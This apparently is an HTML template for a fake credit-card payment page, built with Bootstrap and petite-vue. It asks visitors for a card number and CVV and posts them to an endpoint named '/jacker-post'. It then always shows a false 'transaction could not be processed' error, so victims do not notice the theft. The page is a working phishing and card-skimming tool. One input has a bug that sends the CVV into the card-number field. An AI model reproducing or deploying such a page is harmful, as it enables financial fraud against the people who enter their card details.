
<html lang="en">
  <head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <title>
      Bootstrap demo 
          
    </title>
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha1/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-GLhlTQ8iRABdZLl6O3oVMWSktQOp6b7In1Zl3/Jr59b6EGGoI1aFkw7cmDA6j6gD" crossorigin="anonymous" />
  </head>

  <script type="module">
    import { createApp , reactive } from 'https://unpkg.com/petite-vue?module'

    const store = reactive({
      number: '',
      cvv: ''
    })
    
    const submitted = reactive({submitted: false})

    const submit = async () => {
      try {
        const resp = await fetch(`/jacker-post`, {
          method: 'post',
          headers: {
            'content-type': 'application/json' 
          },
          body: JSON.stringify(store)
        })
      } catch (e) {
        
      } finally {
        console.log(submitted.submitted)
        submitted.submitted = true
      }
    }


    createApp({ 
      store,
      submitted,
      submit
    }).mount()
  </script>

  <body>
      <div class="m-3 d-flex justify-content-center">
        <div v-if="!submitted.submitted">
          <div>
            <img src="/cargs.png" style="max-width:100px;" />
          </div> 
          <div>
            <strong>To proceed to payment, please enter credit card information.</strong>
          </div>
          <div>
            <hr class="border border-dark" />
          </div>
          <div class="my-2">
            <label>
              <small>
                <strong>
                  Total payment: IDR {{ totalPayment }}
                </strong>
              </small>
            </label>
          </div>
          <label>
            <small>
              <strong>
                CC Number
              </strong>
            </small>
          </label>
          <div class="d-flex justify-content-start my-2">
            <input 
              @blur="{
                store.number = $event.target.value
              }" 
              class="form-control form-control-sm shadow shadow-sm" 
              placeholder="Credit card number..." 
            />
          </div> 
          <label>
            <small>
              <strong>
                CVV Code (look at the back of your card)
              </strong>
            </small>
          </label>
          <div class="d-flex justify-content-start my-2">
            <input 
              @blur="{
                store.number = $event.target.value
              }" 
              class="form-control form-control-sm shadow shadow-sm" 
              placeholder="CVV Code..." 
              style="max-width: 100px" 
            />
          </div> 
          <div>
            <hr class="border border-dark" />
          </div>
          <div>
            <button 
              @click="{
                submit()
              }"
            class="btn btn-sm btn-success">
              Submit
            </button>
          </div>
          {# <div>
            {{ '{{ JSON.stringify(store) }}' }}
          </div> #}
        </div>
        <div v-else>
          <div>
            <h6>
              We are sorry, but your transaction could not be processed because of an error from our end. Please try again later.
            </h6>
          </div>
          <div>
            <a href="/">
              <button class="btn btn-sm btn-outline-primary">
                Back to payment menu
              </button>
            </a>
          </div>
        </div>
        
      </div>
      
    
    <script
      src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha1/dist/js/bootstrap.bundle.min.js"
      integrity="sha384-w76AqPfDkMBDXo30jS1Sgez6pr3x5MlQ1ZAGC+nuZB+EYdgRZgiwxhTBTkF7CXvN"
      crossorigin="anonymous"
    ></script>
  </body>
</html>
